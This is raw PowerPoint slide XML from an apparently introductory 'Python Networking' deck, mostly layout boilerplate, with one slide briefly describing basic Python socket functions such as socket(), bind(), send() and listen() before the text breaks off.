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1DE0-A51C-45C2-8787-B136B077BF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6D7114-6BAF-4F0E-8581-8E40F81E82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8EE9A8-269A-42BE-B079-91A4E5A4BA65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDD506B-6CFA-433E-9A21-E30C8DE3F3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BD1109-7212-4A53-9018-ECA698CE20F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420131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1E1C-B8FF-45C7-83C7-CB8CB036F3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B190B3-381A-4FAA-AD67-B571292D5F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EDB9D9-C05D-4F5A-8256-FD358E038D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B283A2-5506-4687-93C8-BCE63758A5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F1DFEB-9394-466F-ABA1-20F55EF3D838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18365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02E6D7-6551-4B87-B8B6-686A27B381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513843-7062-4BB3-9899-9C1E170DFE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0E763E-B452-4EA4-AE56-A68FF812D3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A2AD26F-70F1-4481-B2A2-7AB2F80F5E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5A3DAE-F8A9-4FCC-9485-39C2A0D02697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2973173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C5E2-6345-473F-9B43-5660B4B812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784480-276F-4CB6-9C58-889F33BB9A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73AC32-2677-4A7B-A665-7FBD32DE286B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16ABBEA-AF0C-4E14-A833-C227C3D35D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960A4E-A54B-4B05-A900-25201A0F46B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47887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16321-C6C5-432F-9D38-038CA964D9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4163CC-73FA-4969-BDC7-72FF89F454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4D20BB-C600-4533-A54F-91FA231921E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5E76FB-578D-486E-AE78-5D5FEF957D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085352-39B9-40BA-95D8-82069481ED5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3934387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88B3-6B45-4D51-9A53-A84A1C2E71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FBF909-EB76-4145-8DDC-D529EE453E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4C08A7-28F5-4D66-9210-2D05BA2E6A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E15963-A164-40D0-9D74-BA88503D7913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DC90BA-FED9-407F-9D88-0E1B66F869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87FEEB-1DCB-4917-9F06-F7AFC96F1E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1677951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4A41C-AC96-46DF-9AA7-5616E5E7BE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4D82F2-84FA-452B-8D69-EA9FCCC492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63E16E-E2A6-4FD2-AB6F-B99ECD6F4E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B34811-18BB-498A-9E29-D893C9C6B0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380DA3-3D2A-4C9C-B200-F8F7137AE7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E88C52-23B9-4E88-A628-78534942A4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A4D4D2-9FD6-44B4-BF17-BF7B2C7E74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B9FCA1-006E-43CD-B066-FD34A4844754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326398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A4C7-FD13-46FF-823F-05D1AB3358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93C27C-166A-44C4-9643-EAF94B310B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1567E42-674D-485F-B274-15950F9637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97FCCB-9442-4A8F-AE8F-10F8BFEFEFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172967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C3C0B-D28B-4C1C-BBB2-030AD464C9AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC3325F-FEB1-45C1-810D-83F1960426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A541FA-F423-4AE2-9CCE-1B866B5F5999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163965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6B644-1EC3-4E2D-8362-E2A7C62343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3C9DB2-344B-4AEC-B572-D328B7AD57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56DC42-0312-4C0A-A0B3-C12711EBA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6BC6FF-8AD4-4FE9-A500-44FE6278F015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F851F76-2400-4E73-BD8E-6B676548D2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36A745-ECCA-48F6-AEAC-D285A4A5A8DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="646085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7717-E4B4-4638-9621-C2ACB0A1B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720540-AC39-4F62-B926-B1F0E92A3E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D5ED36-FD46-4282-9F38-09CF6508D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760F3-B378-4AED-A91F-355F8C597CA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{292EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EE8D87-0FDD-4DED-A4A7-5D0EB3DD51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2F7F48-FCD8-4743-A7DB-447171E95C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="563564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5AF43-2F95-48FE-8C92-93A35438D9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F6070B-BCD7-4D43-917A-11D33849EA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5188B2-F058-4B3C-A76F-997F1242CF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EBFF8-A9BC-4610-B7AF-AEEF877AFDFF}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18-06-2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{252E81AC-54C1-4DFD-9D45-6F415A40C5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9F964C-4774-444A-8D14-5EBF66616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01E9EB-FF43-437E-81D6-D3759F507CD0}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399234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hatsmyip.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DD287-DEAF-48F3-A971-34154D8E04E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Networking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37039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A9CA-19D5-4A34-AECC-61C54F4A8A3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="451621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Socket  commands in Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAAF60D-D54F-4F86-994B-3A17E683BCA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1473693"/>
            <a:ext cx="10515600" cy="4703270"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– creates the socket to start communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host,port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– bind IP address &amp; port no together to socket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– used to send message to another computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– other  computer continuously listens whether other computer is sending information or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
